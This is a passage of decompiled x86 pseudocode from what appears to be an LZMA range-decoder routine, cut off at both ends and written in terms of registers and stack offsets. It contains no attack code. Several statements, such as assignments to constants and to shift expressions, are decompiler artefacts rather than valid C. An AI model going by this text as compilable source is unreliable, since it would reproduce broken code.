                                                                                                                      													goto L41;
                                                                                                                      												}
                                                                                                                      											case 7:
                                                                                                                      												goto L0;
                                                                                                                      											case 8:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                      												} else {
                                                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                                                      													__ecx =  *(__ebp - 4);
                                                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                      												}
                                                                                                                      												while(1) {
                                                                                                                      													L132:
                                                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											case 9:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													goto L89;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                                                      													goto L171;
                                                                                                                      												}
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      												__eflags = _t258;
                                                                                                                      												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                      												goto L75;
                                                                                                                      											case 0xa:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                      													 *(__ebp - 0x84) = 0xb;
                                                                                                                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                      													while(1) {
                                                                                                                      														L132:
                                                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                                                      														goto L133;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                      												goto L88;
                                                                                                                      											case 0xb:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      												} else {
                                                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      												L88:
                                                                                                                      												__ecx =  *(__ebp - 0x2c);
                                                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      												L89:
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												 *(__ebp - 0x80) = 0x15;
                                                                                                                      												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                      												goto L68;
                                                                                                                      											case 0xc:
                                                                                                                      												L99:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t334 = __ebp - 0x70;
                                                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t334;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                      												goto L101;
                                                                                                                      											case 0xd:
                                                                                                                      												L37:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t122 = __ebp - 0x70;
                                                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t122;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												L39:
                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                      													goto L48;
                                                                                                                      												}
                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                      													goto L54;
                                                                                                                      												}
                                                                                                                      												L41:
                                                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                                                      												__eax = __eax + 1;
                                                                                                                      												__eax = __eax << 8;
                                                                                                                      												__eax = __eax + __ebx;
                                                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edx;
                                                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													goto L39;
                                                                                                                      												} else {
                                                                                                                      													goto L37;
                                                                                                                      												}
                                                                                                                      											case 0xe:
                                                                                                                      												L46:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t156 = __ebp - 0x70;
                                                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t156;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												while(1) {
                                                                                                                      													L48:
                                                                                                                      													__eflags = __ebx - 0x100;
                                                                                                                      													if(__ebx >= 0x100) {
                                                                                                                      														break;
                                                                                                                      													}
                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                      													__edx = __ebx + __ebx;
                                                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                                                      													__esi = __edx + __eax;
                                                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      													__ax =  *__esi;
                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      														__cx = __ax;
                                                                                                                      														__ebx = __edx + 1;
                                                                                                                      														__cx = __ax >> 5;
                                                                                                                      														__eflags = __eax;
                                                                                                                      														 *__esi = __ax;
                                                                                                                      													} else {
                                                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                                                      														0x800 = 0x800 - __edi;
                                                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      														__ebx = __ebx + __ebx;
                                                                                                                      														 *__esi = __cx;
                                                                                                                      													}
                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      														continue;
                                                                                                                      													} else {
                                                                                                                      														goto L46;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												L54:
                                                                                                                      												_t173 = __ebp - 0x34;
                                                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                      												__eflags =  *_t173;
                                                                                                                      												goto L55;
                                                                                                                      											case 0xf:
                                                                                                                      												L58:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t203 = __ebp - 0x70;
                                                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t203;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												L60:
                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                      													L55:
                                                                                                                      													__al =  *(__ebp - 0x44);
                                                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                      													goto L56;
                                                                                                                      												}
                                                                                                                      												L61:
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                      												__esi = __edx + __eax;
                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													__ebx = __edx + 1;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													goto L60;
                                                                                                                      												} else {
                                                                                                                      													goto L58;
                                                                                                                      												}
                                                                                                                      											case 0x10:
                                                                                                                      												L109:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t365 = __ebp - 0x70;
                                                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t365;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												goto L111;
                                                                                                                      											case 0x11:
                                                                                                                      												L68:
                                                                                                                      												_t614 =  *(_t621 - 0x58);
                                                                                                                      												 *(_t621 - 0x84) = 0x12;
                                                                                                                      												while(1) {
                                                                                                                      													L132:
                                                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											case 0x12:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                      													while(1) {
                                                                                                                      														L132:
                                                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                                                      														goto L133;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                      												goto L130;
                                                                                                                      											case 0x13:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													_t469 = __ebp - 0x58;
                                                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                      													__eflags =  *_t469;
                                                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                                                      													L144:
                                                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                                                      													goto L145;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                      												L130:
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                                                      												goto L144;
                                                                                                                      											case 0x14:
                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                                                      												 *(_t621 - 0x88) = _t542;
                                                                                                                      												goto L1;
                                                                                                                      											case 0x15:
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      												goto L120;
                                                                                                                      											case 0x16:
                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                      												__eflags = __eax - 4;
                                                                                                                      												if(__eax >= 4) {
                                                                                                                      													_push(3);
                                                                                                                      													_pop(__eax);
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                                                      												__eax = __eax << 7;
                                                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												goto L145;
                                                                                                                      											case 0x17:
                                                                                                                      												L145:
                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                      												goto L149;
                                                                                                                      											case 0x18:
                                                                                                                      												L146:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t484 = __ebp - 0x70;
                                                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t484;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												L148:
                                                                                                                      												_t487 = __ebp - 0x48;
                                                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                      												__eflags =  *_t487;
                                                                                                                      												L149:
                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                                                      													0 = 1;
                                                                                                                      													__eax = 1 << __cl;
                                                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                      													while(1) {
                                                                                                                      														 *(_t621 - 0x88) = _t542;
                                                                                                                      														goto L1;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x50);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												__esi = __edx + __eax;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eax = __eax - __ecx;
                                                                                                                      													__edx = __edx + 1;
                                                                                                                      													__eflags = __edx;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      													 *(__ebp - 0x50) = __edx;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													goto L148;
                                                                                                                      												} else {
                                                                                                                      													goto L146;
                                                                                                                      												}
                                                                                                                      											case 0x19:
                                                                                                                      												__eflags = __ebx - 4;
                                                                                                                      												if(__ebx < 4) {
                                                                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                                                                      													L119:
                                                                                                                      													_t393 = __ebp - 0x2c;
                                                                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                      													__eflags =  *_t393;
                                                                                                                      													L120:
                                                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                                                      													__eflags = __eax;
                                                                                                                      													if(__eax == 0) {
                                                                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                      														goto L170;
                                                                                                                      													}
                                                                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                      														goto L171;
                                                                                                                      													}
                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                      													__eax =  *(__ebp - 0x30);
                                                                                                                      													_t400 = __ebp - 0x60;
                                                                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                      													__eflags =  *_t400;
                                                                                                                      													goto L123;
                                                                                                                      												}
                                                                                                                      												__ecx = __ebx;
                                                                                                                      												__eax = __ebx;
                                                                                                                      												__ecx = __ebx >> 1;
                                                                                                                      												__eax = __ebx & 0x00000001;
                                                                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                                                                      												__al = __al | 0x00000002;
                                                                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                      												__eflags = __ebx - 0xe;
                                                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                                                      												if(__ebx >= 0xe) {
                                                                                                                      													__ebx = 0;
                                                                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                                                                      													L102:
                                                                                                                      													__eflags =  *(__ebp - 0x48);
                                                                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                                                                      														__eax = __eax + __ebx;
                                                                                                                      														 *(__ebp - 0x40) = 4;
                                                                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                                                                      														__eax =  *(__ebp - 4);
                                                                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                      														__eflags = __eax;
                                                                                                                      														L108:
                                                                                                                      														__ebx = 0;
                                                                                                                      														 *(__ebp - 0x58) = __eax;
                                                                                                                      														 *(__ebp - 0x50) = 1;
                                                                                                                      														 *(__ebp - 0x44) = 0;
                                                                                                                      														 *(__ebp - 0x48) = 0;
                                                                                                                      														L112:
                                                                                                                      														__eax =  *(__ebp - 0x40);
                                                                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                      															_t391 = __ebp - 0x2c;
                                                                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                      															__eflags =  *_t391;
                                                                                                                      															goto L119;
                                                                                                                      														}
                                                                                                                      														__eax =  *(__ebp - 0x50);
                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                      														__eax =  *(__ebp - 0x58);
                                                                                                                      														__esi = __edi + __eax;
                                                                                                                      														 *(__ebp - 0x54) = __esi;
                                                                                                                      														__ax =  *__esi;
                                                                                                                      														__ecx = __ax & 0x0000ffff;
                                                                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                      															__ecx = 0;
                                                                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                      															__ecx = 1;
                                                                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                      															__ebx = 1;
                                                                                                                      															__ecx =  *(__ebp - 0x48);
                                                                                                                      															__ebx = 1 << __cl;
                                                                                                                      															__ecx = 1 << __cl;
                                                                                                                      															__ebx =  *(__ebp - 0x44);
                                                                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                      															__cx = __ax;
                                                                                                                      															__cx = __ax >> 5;
                                                                                                                      															__eax = __eax - __ecx;
                                                                                                                      															__edi = __edi + 1;
                                                                                                                      															__eflags = __edi;
                                                                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                                                                      															 *__esi = __ax;
                                                                                                                      															 *(__ebp - 0x50) = __edi;
                                                                                                                      														} else {
                                                                                                                      															 *(__ebp - 0x10) = __edx;
                                                                                                                      															0x800 = 0x800 - __ecx;
                                                                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                      															 *__esi = __dx;
                                                                                                                      														}
                                                                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      															L111:
                                                                                                                      															_t368 = __ebp - 0x48;
                                                                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                      															__eflags =  *_t368;
                                                                                                                      															goto L112;
                                                                                                                      														} else {
                                                                                                                      															goto L109;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      													__ecx =  *(__ebp - 0xc);
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                      														__ecx =  *(__ebp - 0x10);
                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                      														__ebx = __ebx | 0x00000001;
                                                                                                                      														__eflags = __ebx;
                                                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                                                      													}
                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      														L101:
